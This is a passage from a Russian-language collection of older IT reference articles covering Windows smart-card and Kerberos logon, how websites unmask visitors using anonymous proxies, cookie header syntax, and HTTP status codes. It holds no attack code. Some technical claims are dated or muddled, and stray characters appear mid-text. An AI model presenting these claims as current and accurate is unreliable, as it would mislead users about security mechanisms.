PnP-идентификатором. Они управляются стандартными драйверами устройств Windows и устанавливаются и удаляются средствами мастера Hardware wizard. В Windows 2000 Server и Windows XP Professional имеются драйверы для многих коммерческих PnP-устройств чтения смарт-карт с логотипом совместимости с Windows. Некоторые производители поставляют драйверы для несертифицированных устройств чтения, которые в настоящее время работают с Windows. И все же для обеспечения постоянной поддержки Microsoft рекомендуется приобретать устройства чтения смарт-карт, имеющие логотип совместимости с Windows. Вход в систему с использованием смарт-карты Смарт-карты применяются для входа только под доменными, но не локальными учетными записями. Если вход в систему в интерактивном режиме под учетной записью домена в Windows 2000 Server и Windows XP Professional выполняется по паролю, используется протокол проверки подлинности Kerberos v5. При входе со смарт-картой ОС использует Kerberos v5 с сертификатами X.509 v3, если только контроллер домена не работает под Windows 2000 Server. Если вместо пароля применяется смарт-карта, хранимая на ней пара ключей заменяется общим секретным ключом, созданным на основе пароля. Закрытый ключ есть только на смарт-карте. Открытый ключ предоставляется всем, с кем нужно обмениваться конфиденциальной информацией. Применение смарт-карт для администрирования Администраторы выполняют свою обычную работу под учетной записью простого пользователя, а привилегированную административную учетную запись применяют для администрирования. Такие инструментальные средства и утилиты, как Net.exe и Runas.exe, позволяют им работать с дополнительными реквизитами. В Windows XP Professional служебные программы также применяются для управления реквизитами на смарт-картах. Kerberos v5 В Windows 2000 и Windows XP Professional реквизиты предоставляются в виде пароля, билета Kerberos или смарт-карты (если компьютер оборудован для работы со смарт-картами). Протокол Kerberos v5 обеспечивает взаимную проверку подлинности клиента (например, пользователя, компьютера или службы) и сервера. Kerberos v5 предоставляет для серверов высокоэффективные средства аутентификации клиентов даже в огромных и чрезвычайно сложных сетевых средах. Протокол Kerberos основан на предположении, что начальный обмен между клиентами и серверами выполняется в открытой сети, т. е. в такой, где любой неавторизованный пользователь может имитировать клиент или сервер, перехватывать или подделывать сообщения между полномочными клиентами и серверами. Kerberos v5 поддерживает защищенный и эффективный механизм проверки подлинности в сложных сетях с клиентами и ресурсами. В Kerberos v5 применяется секретный (симметричный) ключ шифрования для защиты передаваемых по сети реквизитов входа в систему. Этот же ключ использует получатель для расшифровки реквизитов. Расшифровка и все последующие шаги выполняются службой центра распространения ключей Kerberos, работающей на каждом контроллере домена в составе Active Directory. Аутентификатор Аутентификатор - это информация (например, метка времени), уникальная для каждого сеанса проверки и присоединяемая к зашифрованным реквизитам входа в систему для гарантии того, что переданное ранее сообщение с реквизитами не используются повторно. Для подтверждения получения и принятия исходного сообщения генерируется новый аутентификатор и присоединяется к зашифрованному ответу KDC клиенту. Если реквизиты входа в систему и аутентификатор удовлетворяют KDC, он выпускает билет TGT (ticket-granting ticket), на основании которого диспетчер локальной безопасности (Local Security Authority, LSA) получает билеты служб. Билеты служб содержат зашифрованные данные, подтверждающие подлинность клиента, и применяются для получения доступа к сетевым ресурсам без дополнительной проверки подлинности на все время действия билета. Начальный ввод пароля или реквизитов со смарт-карты "виден" пользователю, все остальное происходит автоматически ("прозрачно") без его участия. Служба центра распространения ключей Kerberos Эта служба применяется совместно с протоколом проверки подлинности Kerberos для аутентификации запросов на вход в систему в соответствии с данными в Active Directory. Kerberos v5 используется в Windows 2000 Server и Windows XP Professional по умолчанию, но для нормальной работы этого протокола требуется, чтобы и контроллеры домена, и клиентские компьютеры работали под управлением Windows 2000 или Windows XP Professional. Если это условие не соблюдается, для проверки подлинности используется протокол NTLM.
  18. Anti-proxy: как определить IP адрес человека, использующего анонимный proxy? -------------------------------------------------------------------------------- Как Вы уже знаете, существуют анонимные proxy, используя которые Вы можете анонимно путешествовать по Internet. А существуют ли способы "вычислить" посетителя, пользующегося анонимными proxy серверами? Да, существуют. Имеются средства, позволяющие как определить посетителя, который пользуется разными анонимными proxy, так и определить Ваш IP адрес, даже если Вы используете анонимный proxy сервер. Cookies На первый взгляд, cookies не имеют никакого отношения к proxy. Cookie - это небольшая порция информации, которую сервер может передавать клиенту в дополнение к запрошенной web-странице. Эту дополнительную информацию браузер клиента сохраняет у себя и выдает по запросу сервера. Cookies могут быть как на время одной сессии (после чего они удаляются), так и постоянно храниться на компьютере клиента. Для чего нужны cookies? К примеру, при входе на сайт у Вас запрашивается пароль (скажем, на почте). После ввода пароль сохраняется в cookies и при переходе со страницы на страницу (когда Вы читаете сообщения) вместо того чтобы каждый раз спрашивать у Вас пароль, сервер берет его из cookies. Что дает cookie для определения proxy? IP адрес с помощью cookie не определить. Однако, при первом входе на web сайт IP адрес клиента (определенный сервером, т.е. IP proxy) сервер может сохранить в cookies. А когда Вы в следующий раз входите на сайт, сервер вновь определяет Ваш IP и сравнивает его с сохраненным в cookies. И если IP адреса (старый и новый) различаются, сервер "может сделать выводы". И если Вы не запретите у себя cookies, никакой proxy Вам не поможет (анонимайзеры могут запретить cookies прямо у себя, не пропуская их к Вашему компьютеру). JavaScript / VBScript Это специальные подпрограммы (скрипты), которые выполняются на компьютере пользователя. Поэтому как Вы ни настраивайте браузер (если только Вы не запретите выполнение активных сценариев - этих скриптов), Ваш реальный IP адрес скрыть не удастся. Эти скрипты являются простыми программами и обладают довольно ограниченным набором функций, однако они могут определить Ваш IP и множество различных настроек Вашего браузера. Кроме того, они (в принципе) могут даже изменить настройки Вашего браузера! Защита от этих скриптов является многоступенчатой, Вы можете ограничивать доступ скриптов к тем или иным возможностям браузера. Однако наиболее надежным вариантом защиты является полный запрет выполнения активных сценариев. Запретить скрипты Вы можете и прямо в анонимайзерах. Java В отличие от JavaScript, Java является полноценным языком программирования и (как следствие) программы на Java обладают значительно более широкими возможностями (в частности, это касается определения настроек Вашего браузера и различных функций для работы с Internet). То есть программы на Java могут легко определить Ваш IP и практически любые настройки браузера. Что касается защиты от определения Вашего IP адреса с помощью Java, то тут все сложнее: самым надежным (и вероятно практически единственным) способом является полный запрет Java, поскольку Java имеет очень много различных сетевых функций и проблематично запретить их все. ActiveX и plug-ins ActiveX и plug-ins - это подключаемые к браузеру модули и различные дополнения для браузера. Эти модули являются на самом деле полноценными программами, которые выполняются на компьютере пользователя. Поэтому они обладают гораздо более широкими возможностями, чем Java и JavaScript. Они могут легко определить любые настройки браузера, "вычислить" Ваш реальный IP адрес, и даже легко изменить настройки proxy! Защитой от них является полный запрет ActiveX и запрет автоматической установки plug-ins. Борьба "брони и снаряда" Война желающих быть анонимными в Internet с желающими знать все о своих клиентах будет вечной. Будут появляться новые средства для сокрытия информации о своих перемещениях по Сети и будут новые средства, "пробивающие" или "обходящие" эту защиту. Защититься от определения Вашего IP можно несколькими способами: запреты запретить cookies запретить выполнение активных сценариев запретить Java запретить ActiveX использовать Socks-ификацию браузера. При этом вся информация, которую отправляет и принимает Ваш браузер (или другая программа), "перехватывается" и направляется на proxy сервер. В 1-м случае "пробить" такую защиту очень просто: достаточно построить сайт на основе Java / JavaScript / Cookies (например динамические меню и т.д.). В этом случае при отключении активных сценариев сайт станет просто "нерабочим" (а на web почту с отключенными cookies могут просто не пустить). Во втором случае нет 100% гарантии, что Ваш IP будет действительно "спрятан". Объясню подробнее: для определения Вашего IP есть 2 метода: Java программа обращается напрямую в Internet, минуя proxy (она это может, даже если Ваш браузер настроен на работу через proxy) и сервер "сообщает" программе, какой у Вас реальный IP адрес анализируются настройки Windows и IP адрес выявляется из настроек Так вот, socks-ификация может защитить от 1-го способа определения IP, но не от 2-го! Так что же делать, если очень нужно и анонимным быть и чтобы Java / JavsScript / ActiveX были? В чем суть задачи? Чтобы, с одной стороны, анализируя настройки компьютера, нельзя было узнать реальный внешний IP адрес и в то же время чтобы нельзя было подключиться в Internet напрямую (минуя анонимный proxy сервер). Возможны 2 варианта: Корпоративная сеть, внутренние IP адреса (192.168.1.x или что-то в этом роде). Корпоративный proxy сервер переадресует все запросы на анонимный бесплатный прокси (для того, чтобы это сделать, Вам нужны полномочия - и знания - системного администратора). Минуя корпоративный прокси в Internet подключиться невозможно (поскольку у компьютера нет внешнего IP адреса), анализируя настройки компьютера - тоже. Если даже Java / ActiveX скрипт определит (и "выдаст" web серверу) Ваш внутренний IP адрес (192.168.1.x), это не раскроет Вашу анонимность. В общем можно считать это 100% анонимностью. Поставить на своем компьютере Firewall, в котором запретить все соединения с Internet из браузера (кроме как с тем прокси сервером, который Вам нужен). При этом желательно сделать port mapping на этот бесплатный прокси сервер, а в браузере прописать "прокси" 127.0.0.1 и локальный порт из port mapping. Но тут возможна проблема - поскольку у Вас реальный и внешний IP адрес, он может быть передан серверу (скрипт проанализирует настройки Windows и "выдаст" Ваш IP). И последнее: любой proxy сервер (а тем более бесплатный) ведет лог-файл (протокол своей работы), в котором подробно расписано, какой IP адрес в какое время куда обращается. И человек (или организация), который располагает соответствующими полномочиями (доступом к любой информации) и запасом времени, всегда сможет выяснить, куда Вы ходили и что Вы делали, даже если Вы будете использовать цепочки из 10 анонимных proxy серверов в разных концах планеты.
  19. Формат и синтаксис Cookie -------------------------------------------------------------------------------- Спецификация Полное описание поля Set-Cookie HTTP заголовка: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure Минимальное описание поля Set-Cookie HTTP заголовка: Set-Cookie: NAME=VALUE; NAME=VALUE - строка символов, исключая перевод строки, запятые и пробелы. NAME-имя cookie, VALUE - значение. expires=DATE - время хранения cookie, т.е. вместо DATE должна стоять дата в формате Wdy, DD-Mon-YYYY HH:MM:SS GMT, после которой истекает время хранения cookie. Если этот атрибут не указан, то cookie хранится в течение одного сеанса, до закрытия броузера. domain=DOMAIN_NAME - домен, для которого значение cookie действительно. Например, domain=cit-forum.com. В этом случае значение cookie будет действительно и для сервера cit-forum.com, и для www.cit-forum.com. Но не радуйтесь, указания двух последних периодов доменных имен хватает только для доменов иерархии "COM", "EDU", "NET", "ORG", "GOV", "MIL", и "INT". Для доменов иерархии "RU" придется указывать три периода. Если этот атрибут опущен, то по умолчанию используется доменное имя сервера, с которого было выставлено значение cookie. path=PATH - этот атрибут устанавливает подмножество документов, для которых действительно значание cookie. Например, указание path=/win приведет к тому, что значение cookie будет действительно для множества документов ffb в директории /win/, в директории /wings/ и файлов в текущей директории с именами типа wind.html и windows.shtml Если этот атрибут не указан, то значение cookie распространяется только на документы в той же директории, что и документ, в котором было установлено cookie. secure - если стоит такой маркер, то информация cookie пересылается только через HTTPS (HTTP с использованием SSL). Если этот маркер не указан, то информация пересылается обычным способом. Синтаксис HTTP заголовка для поля Cookie Когда запрашивается документ с HTTP сервера, броузер проверяет свои cookie на предмет соответствия домену сервера и прочей информации. В случае, если найдены удовлетворяющие всем условиям значения cookie броузер посылает их в серверу в виде пары имя/значение: Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2 ... Дополнительные сведения В случае, если cookie принимает новое значение при имеющемся уже в броузере cookie с совпадающими NAME, domain и path, старое значение затирается новым. В остальных случаях новые cookies добавляются. Использование expires не гарантирует сохранность cookie в течение заданного периода времени, поскольку клиент (броузер) может удалить запись вследствие нехватки выделенного места или каких-либо других лимитов. Клиент (броузер) имеет следующие ограничения: всего может храниться до 300 значений cookies каждый cookie не может превышать 4Кбайт с одного сервера или домена может храниться до 20 значений cookie Если ограничение 300 или 20 превышается, то удаляется первая по времени запись. При превышении 4К - корректность такого cookie страдает - отрезается кусок записи (с начала этой записи) равный превышению. В случае кэширования документов, например, proxy-сервером, поле Set-cookie HTTP заголовка никогда не кэшируется. Если proxy-сервер принимает ответ, содержащий поле Set-cookie в заголовке, предполагается, что поле таки доходит до клиента вне зависимости от статуса 304 (Not Modified) или 200 (OK). Соответственно, если клиентский запрос содержит в заголовке Cookie, то он должен дойти до сервера, даже если установлен If-modified-since. Я полагаю, что все что сказано про proxy не относится к случаю, когда cookie устанавливается жестко с помощью META-тагов. Примеры Ниже приведено несколько примеров, иллюстрирующих использование cookies Первый пример: Клиент запрашивает документ и принимает ответ: Set-Cookie: CUSTOMER=WILE_E_COYOTE; path=/; expires=Wednesday, 09-Nov-99 23:12:40 GMT Когда клиент запрашивает URL с путем "/" на этом сервере, он посылает: Cookie: CUSTOMER=WILE_E_COYOTE Клиент запрашивает документ и принимает ответ: Set-Cookie: PART_NUMBER=ROCKET_LAUNCHER_0001; path=/ Когда клиент запрашивает URL с путем "/" на этом сервере, он посылает: Cookie: CUSTOMER=WILE_E_COYOTE; PART_NUMBER=ROCKET_LAUNCHER_0001 Клиент получает: Set-Cookie: SHIPPING=FEDEX; path=/foo Когда клиент запрашивает URL с путем "/" на этом сервере, он посылает: Cookie: CUSTOMER=WILE_E_COYOTE; PART_NUMBER=ROCKET_LAUNCHER_0001 Когда клиент запрашивает URL с путем "/foo" на этом сервере, он посылает: Cookie: CUSTOMER=WILE_E_COYOTE; PART_NUMBER=ROCKET_LAUNCHER_0001; SHIPPING=FEDEX Второй пример: Клиент принимает: Set-Cookie: PART_NUMBER=ROCKET_LAUNCHER_0001; path=/ Когда клиент запрашивает URL с путем "/" на этом сервере, он посылает: Cookie: PART_NUMBER=ROCKET_LAUNCHER_0001 Клиент принимает: Set-Cookie: PART_NUMBER=RIDING_ROCKET ba3 _0023; path=/ammo Когда клиент запрашивает URL с путем "/ammo" на этом сервере, он посылает: Cookie: PART_NUMBER=RIDING_ROCKET_0023; PART_NUMBER=ROCKET_LAUNCHER_0001 Комментарий: здесь мы имеем две пары имя/значение с именем "PART_NUMBER". Это наследие из предыдущего примера, где значение для пути "/" прибавилось к значению для "/ammo".
  20. Коды ответов Web-сервера -------------------------------------------------------------------------------- В первой строке ответа HTTP-сервера содержится информация о том, был запрос клиента успешным или нет, а также данные о причинах успешного либо неуспешного завершения запроса. Эта информация обозначается трехразрядным кодом ответа сервера (иногда его называют кодом состояния) и сопровождается описательным сообщением. Коды состояний обычно генерируются Web-серверами, но иногда это могут делать и CGI-сценарии, CGI-сценарии генерируют собственные заголовки вместо тех, которые должен выдавать сервер. Коды состояний группируются следующим образом: Диапазон кодов Значение ответа 100-199 Информационный 200-299 Запрос клиента успешен 300-399 Запрос клиента переадресован, необходимы дальнейшие действия 400-499 Запрос клиента является неполным 500-599 Ошибки сервера В HTTP в каждом диапазоне определены лишь несколько кодов, хотя для сервера при необходимости могут определяться собственные коды. Клиент при получении кода, который он не может распознать, интерпретирует его в соответствии с диапазоном, к которому этот код принадлежит. Коды в диапазонах 100-199, 200-299 и 300-399 большинство Web-броузеров обрабатывают без извещения пользователя, а некоторые коды ошибок из диапазонов 400-499 и 500-599 отображаются для пользователя (например, 404 Not Found). Информационные ответы Ответы в диапазоне 100-199 - информационные; они показывают, что запрос клиента принят и обрабатывается. 100 Continue Начальная часть запроса принята, и клиент может продолжать передачу запроса. 101 Switching Protocols Сервер выполняет требование клиента и переключает протоколы в соответствии с указанием, данным в поле заголовка Upgrade. Успешные запросы клиента Ответы в диапазоне 200-299 означают, что запрос клиента обработан успешно. 200 OK Запрос клиента обработан успешно, и ответ сервера содержит затребованные данные. 201 Created Этот код состояния используется в случае создания нового URI. Вместе с этим кодом результата сервер выдает заголовок Location (см. главу 19), который содержит информацию о том, куда были помещены новые данные. 202 Accepted Запрос принят, но обрабатывается не сразу. В теле содержимого ответа сервера может быть дана дополнительная информация о данной транзакции. Гарантии того, что сервер в конечном итоге удовлетворит запрос, нет, даже несмотря на то, что на момент приема запрос выглядел допустимым. 203 Non-Authoritative Information Информация в заголовке содержимого взята из локальной копии или у третьей стороны, а не с исходного сервера. 204 No Content Ответ содержит код состояния и заголовок, но тело содержимого отсутствует. При получении этого ответа броузер не должен обновлять свой документ. Обработчик чувствительных областей изображений может возвращать этот код, когда пользователь щелкает на бесполезных или пустых участках изо- бражения. 205 Reset Content Броузер должен очистить форму, используемую в данной транзакции, для дополнительных входных данных. Полезен для CGI-приложений, требующих ввода данных. 206 Partial Content Сервер возвращает лишь часть данных затребованного объема. Используется в ответе на запрос с указанием заголовка Range. Сервер должен указать диапазон, включенный в ответ, в заголовке Content-Range. Переадресация Код ответа в диапазоне 300-399 означает, что запрос не выполнен и клиенту нужно предпринять некоторые действия для удовлетворения запроса. 300 Multiple Choices Затребованный URI обозначает более одного ресурса. Например, URI может обозначать документ, переведенный на несколько языков. В теле содержи- мого, возвращенном сервером, может находиться перечень более конкретных данных о том, как выбрать ресурс правильно. 301 Moved Permanently Затребованный URI уже не используется сервером, и указанная в запросе операция не выполнена. Новое местонахождение затребованного документа указывается в заголовке Location. Во всех последующих запросах данного документа следует указывать новый URI. 302 Moved Temporarily Затребованный URI перемешен, но лишь временно. Заголовок Location указывает на новое местонахождение. Сразу же после получения этого кода состояния клиент должен разрешить запрос при помощи нового URI, но во всех последующих запросах необходимо пользоваться старым URI. 303 See Other Затребованный URI можно найти по другому URI (указанному в заголовке Location). Его следует выбрать методом GET по данному ресурсу. 304 Not Modified Это код ответа на заголовок lf-Modified-Since, если URI не изменялся с указанной даты. Тело содержимого не посылается, и клиент должен исполь- зовать свою локальную копию. 305 Use Proxy Доступ к затребованному URI должен осуществляться через proxy-сервер, указанный в заголовке Location. Неполные запросы клиента Коды ответов в диапазоне 400-499 означают, что запрос клиента неполный. Эти коды могут также означать, что от клиента требуется дополнительная информация. 400 Bad Request Означает, что сервер обнаружил в запросе клиента синтаксическую ошибку. 401 Unauthorized Этот код результата, передаваемый с заголовком WWW-Authenticate, пока- зывает, что пославший запрос пользователь не имеет необходимых полномочий и что при повторении запроса с указанием данного URI пользователь должен такие полномочия предоставить. 402 Payment Required Этот код в HTTP еще не реализован. 403 Forbidden Запрос отклонен по той причине, что сервер не хочет (или не имеет возможности) ответить клиенту. 404 Not Found Документ по указанному URI не существует. 405 Method Not Allowed Этот код выдается с заголовком Allow и показывает, что метод, используе- мый клиентом, для данного URI не поддерживается. 406 Not Acceptable Ресурс, указанный клиентом по данному URI, существует, но не в том формате, который нужен клиенту. Вместе с этим кодом сервер выдает заголовки Content-Language, Content-Encoding и Content-Type. 407 Proxy Authentication Required Proxy-сервер должен санкционировать запрос перед тем, как пересылать его. Используется с заголовком Proxy-Authenticate. 408 Request Time-out Этот код ответа означает, что клиент не передал полный запрос в течение некоторого установленного промежутка времени (который обычно задается в конфигурации сервера) и сервер разрывает сетевое соединение. 409 Conflict Данный запрос конфликтует с другим запросом или с конфигурацией сервера. Информацию о конфликте следует возвратить в информационной части ответа. 410 Gone Данный код показывает, что затребованный URI больше не существует и навсегда удален с сервера. 411 Length Required Сервер не примет запрос без указанного в нем заголовка Content-Length. 412 Precondition Failed Результат вычисления условия, заданного в запросе одним или несколькими заголовками if. . ., представляет собой "ложь". 413 Request Entity Too Large Сервер не будет обрабатывать запрос, потому что его тело слишком велико. 414 Request-URI Too Long Сервер не будет обрабатывать запрос, потому что его URI слишком длинный. 415 Unsupported Media Type Сервер не будет обрабатывать запрос, потому что его тело имеет неподдер- живаемый формат. Ошибки сервера Коды ответов в диапазоне 500-599 показывают, что сервер столкнулся с ошибкой и, вероятно, не сможет выполнить запрос клиента. 500 Internal Server Error При обработке запроса на сервере один из его компонентов (например, CGI-программа) выдал аварийный отказ или столкнулся с ошибкой конфи- гурации. 501 Not Implemented Клиент запросил выполнение действия, которое сервер выполнить не может. 502 Bad Gateway Сервер (или proxy-сервер) получил недопустимые ответы другого сервера (или proxy-сервера). 503 Service Unavailable Данный код означает, что данная служба временно недоступна, но в будущем доступ к ней будет восстановлен. Если сервер знает, когда это произойдет, может быть также выдан заголовок Retry-After. 504 Gateway Time-out Этот ответ похож на 408 (Request Time-out) , за исключением того, что шлюз или уполномоченный сервер превысил лимит времени. 505 HTTP Version not supported Сервер не поддерживает версию протокола HTTP, использованную в запросе.
×
×
  • Create New...